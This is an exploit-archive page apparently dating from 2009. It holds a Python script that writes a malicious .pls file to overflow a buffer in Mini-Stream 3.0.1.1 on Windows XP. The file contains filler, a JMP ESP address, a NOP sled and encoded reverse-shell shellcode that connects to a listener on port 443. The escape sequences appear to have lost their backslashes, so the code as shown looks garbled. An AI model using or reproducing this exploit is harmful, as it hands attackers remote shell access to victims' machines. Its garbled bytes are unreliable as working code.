Mini-Stream Exploit for Windows XP SP2 and SP3

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mini-Stream Exploit for Windows XP SP2 and SP3
# Published : 2009-12-27
# Author : Ron Henry
# Previous Title : Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit
# Next Title : Mini-Stream 3.0.1.1 Buffer Overflow Exploit (Meta)

#!/usr/bin/python

# ...:| Code Fix/Patch for WinXP - English |:...

# Referenced: http://www.exploit-db.com/exploits/10745 - mr_me
# and fixed the offset as well as tested the exploit against WinXP SP2 and SP3
# Exploit against Mini-Stream 3.0.1.1 WinXP English
# 12.27.2009
# Author: Ron Henry - rlh@ciphermonk.net - dijital1
# Version: Mini-Stream 3.0.1.1
# Downloadable from: http://mini-stream.net/
# Tested against WinXP SP2 and SP3 - English

outputfile="astley.pls"


shellcode="x44"*17403
#shellcode+="xedx1ex94x7c" # JMP ESP - SHELL32.dll Win XP SP2
shellcode+="x53x93x42x7e" # JMP ESP - USER32.dll Win XP SP3
shellcode+="CAFE"*8 # 32 Byte NOP Sled
# msfpayload windows/shell_reverse_tcp LHOST=172.16.77.218 LPORT=443 R | msfencode -e x86/alpha_upper -t c
shellcode+=("x89xe5xdaxd6xd9x75xf4x58x50x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4dx38x4dx59x45x50"
"x43x30x45x50x43x50x4dx59x4ax45x46x51x48x52x42"
"x44x4cx4bx50x52x50x30x4cx4bx50x52x44x4cx4cx4b"
"x50x52x45x44x4cx4bx43x42x51x38x44x4fx48x37x51"
"x5ax51x36x46x51x4bx4fx50x31x4fx30x4ex4cx47x4c"
"x43x51x43x4cx44x42x46x4cx51x30x4fx31x48x4fx44"
"x4dx43x31x4fx37x4dx32x4ax50x46x32x46x37x4cx4b"
"x51x42x42x30x4cx4bx50x42x47x4cx45x51x4ex30x4c"
"x4bx47x30x42x58x4dx55x49x50x44x34x50x4ax45x51"
"x4ex30x46x30x4cx4bx50x48x45x48x4cx4bx50x58x47"
"x50x45x51x48x53x4ax43x47x4cx47x39x4cx4bx47x44"
"x4cx4bx43x31x4ex36x46x51x4bx4fx50x31x4fx30x4e"
"x4cx4fx31x48x4fx44x4dx45x51x4fx37x46x58x4dx30"
"x44x35x4bx44x45x53x43x4dx4bx48x47x4bx43x4dx46"
"x44x42x55x4bx52x50x58x4cx4bx51x48x47x54x43x31"
"x49x43x45x36x4cx4bx44x4cx50x4bx4cx4bx51x48x45"
"x4cx43x31x49x43x4cx4bx43x34x4cx4bx45x51x4ex30"
"x4cx49x50x44x46x44x46x44x51x4bx51x4bx45x31x46"
"x39x50x5ax50x51x4bx4fx4bx50x51x48x51x4fx51x4a"
"x4cx4bx44x52x4ax4bx4cx46x51x4dx45x38x50x33x50"
"x32x45x50x43x30x42x48x43x47x43x43x50x32x51x4f"
"x51x44x42x48x50x4cx43x47x46x46x43x37x4bx4fx48"
"x55x4ex58x4ax30x45x51x45x50x45x50x47x59x48x44"
"x46x34x46x30x43x58x47x59x4bx30x42x4bx45x50x4b"
"x4fx49x45x46x30x50x50x46x30x50x50x47x30x46x30"
"x47x30x50x50x45x38x4ax4ax44x4fx49x4fx4bx50x4b"
"x4fx48x55x4cx49x49x57x42x48x4ex4cx42x30x50x4d"
"x48x5ax42x48x45x52x45x50x45x51x4fx4bx4cx49x4d"
"x36x42x4ax44x50x50x56x51x47x43x58x4cx59x49x35"
"x42x54x45x31x4bx4fx4ex35x43x58x42x43x42x4dx42"
"x44x45x50x4cx49x4bx53x51x47x46x37x50x57x46x51"
"x4bx46x43x5ax44x52x50x59x50x56x4ax42x4bx4dx42"
"x46x4fx37x47x34x46x44x47x4cx45x51x43x31x4cx4d"
"x47x34x51x34x42x30x48x46x45x50x50x44x51x44x50"
"x50x46x36x50x56x46x36x47x36x51x46x50x4ex50x56"
"x46x36x46x33x51x46x42x48x43x49x48x4cx47x4fx4d"
"x56x4bx4fx48x55x4cx49x4dx30x50x4ex51x46x47x36"
"x4bx4fx50x30x43x58x45x58x4bx37x45x4dx45x30x4b"
"x4fx49x45x4fx4bx4cx30x4fx45x4fx52x50x56x42x48"
"x49x36x4cx55x4fx4dx4dx4dx4bx4fx4ex35x47x4cx43"
"x36x43x4cx44x4ax4dx50x4bx4bx4dx30x43x45x45x55"
"x4fx4bx50x47x44x53x44x32x42x4fx42x4ax45x50x46"
"x33x4bx4fx4ex35x44x4ax41x41")


FILE = open(outputfile, "w")
FILE.write(shellcode)
FILE.close()